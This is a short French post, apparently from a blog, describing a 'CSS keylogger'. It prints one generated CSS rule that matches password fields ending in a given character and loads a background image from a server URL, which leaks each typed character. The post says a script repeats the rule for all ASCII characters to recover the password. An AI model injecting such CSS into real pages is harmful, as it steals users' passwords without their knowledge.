Malin ! Un keylogger en CSS !

En fait un script génère pour tous les caractères ASCII, l'instruction CSS suivante :

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

Qui signifie que pour les champs de type password dont la valeur se termine par a, on va effectuer une requête externe vers un serveur avec la lettre a. On fait ça pour tous les caractères et hop on a le mot de passe.

via